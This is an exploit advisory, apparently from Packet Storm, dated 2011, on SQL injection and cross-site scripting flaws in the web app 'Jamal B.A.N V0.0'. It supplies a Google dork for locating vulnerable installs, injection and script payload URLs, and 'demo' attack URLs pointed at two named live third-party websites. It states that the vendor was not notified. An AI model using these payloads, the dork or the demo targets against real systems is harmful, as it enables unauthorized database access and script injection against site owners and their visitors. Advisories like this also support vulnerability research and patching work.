Jamal B.A.N suffers from cross site scripting and remote SQL injection vulnerabilities.
1deef0bff23054c553cc43c8db6d1c929424c3b2ae0c29c68b89c245923526f2
Jamal B.A.N V0.0 Multiple Vulnerabilities
----------------------------------------------------
####
# Author : Yassin Aboukir
# E-mail : 01xp01@gmail.com
# Web : Www.Yaboukir.Com
####
----------------------------------------------------
####
# Title : Jamal B.A.N V0.0 Multiple Vulnerabilities
# Name : Jamal B.A.N V0.0
# Google Dork : "All Right Reserved . Jamal B.A.N V0.0"
# Date : 17/08/2011
# Notified : Unnotified
# Tested on : [Windows Seven Edition Intégral- French]
# Category : Webapps
####
####
#
# Greetz : Ayoub Aboukir (Ethical Hacker) & Friends (...)
#
###
[+] SQL Injection :
[-] Explo!t3 :
http://localhost/index.php?go=news_list&page='[SQL Attack]
[+] Cross site Scripting :
[-] Explo!t3 :
http://localhost/index.php?go=player&id=>"><ScRiPt %0A%0D>alert(438443311603)%3B</ScRiPt>
[+] Demos :
http://aliraqsport.net/index.php?go=news_list&page='
http://www.atlastimes.tk/kora/index.php?go=news_list&page='
Or
http://aliraqsport.net/index.php?go=player&id=>"><ScRiPt %0A%0D>alert(438443311603)%3B</ScRiPt>
http://www.atlastimes.tk/kora/index.php?go=player&id=>"><ScRiPt %0A%0D>alert(438443311603)%3B</ScRiPt>
G00d Luck All PPl ;)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed